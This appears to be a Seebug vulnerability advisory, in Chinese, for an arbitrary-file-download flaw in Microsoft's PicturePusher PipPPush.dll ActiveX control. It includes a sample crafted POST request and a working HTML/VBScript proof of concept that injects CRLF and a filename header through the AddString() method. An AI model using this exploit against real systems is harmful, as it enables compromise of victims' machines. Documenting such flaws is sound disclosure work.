Microsoft PicturePusher 'PipPPush.dll' ActiveX控件任意文件下载漏洞

2008-10-09T00:00:00
ID SSV:4185
Type seebug
Reporter Root
Modified 2008-10-09T00:00:00

Description

BUGTRAQ ID: 31632 CNCAN ID:CNCAN-2008100909

Microsoft Digital Image是一款图像管理处理工具。 其包含的PicturePusher 'PipPPush.dll' ActiveX控件存在设计问题,远程攻击者可以利用漏洞从任意位置下载文件到受影响的电脑。 控件允许构建定制的POST请求实现上传功能,使用浏览器作为代理可以回弹,并通过AddString()方法注入文件名子字段。类似的POST请求如下: POST /?aaaa=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=--------------------------- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0) [MSN Communities Active-X Upload Control] Host: 127.0.0.1 Content-Length: 181 Cache-Control: no-cache


Content-Disposition: form-data; name="aaaa"; filename="suntzu.test" Content-Type: text/plain; AAAA: "" xxxxxxxx


Microsoft PipPPush.dll 7.0.709 Microsoft Digital Image Suite 2006

目前没有解决方案提供: <a href=http://www.microsoft.com/downloads/details.aspx?familyid=7C3B3DED-A15F-48C5-B724-7796FE8C151E&displaylang=en target=_blank>http://www.microsoft.com/downloads/details.aspx?familyid=7C3B3DED-A15F-48C5-B724-7796FE8C151E&displaylang=en</a>

                                        
                                            
                                                &lt;HTML&gt;
&lt;OBJECT classid='clsid:507813C3-0B26-47AD-A8C0-D483C7A21FA7' id='PicturePusherControl' /&gt;
&lt;/OBJECT&gt;
&lt;script language='vbscript'&gt;
    'PicturePusherControl.PostURL = &quot;http://127.0.0.1/?aaaa=1&quot;
    PicturePusherControl.PostURL = &quot;http://192.168.1.1/?aaaa=1&quot;
    PicturePusherControl.AddSeperator
    CRLF = unescape(&quot;%0d%0a&quot;)
    FormElementName=&quot;aaaa&quot;&quot;; filename=&quot;&quot;suntzu.test&quot;&quot; &quot; + CRLF + &quot;Content-Type: text/plain; AAAA: &quot;&quot;&quot;
    Value=&quot;xxxxxxxx&quot;
    'for some reason cannot do this with AddFile() method, however...
    PicturePusherControl.AddString FormElementName ,Value 
    PicturePusherControl.Post
&lt;/script&gt;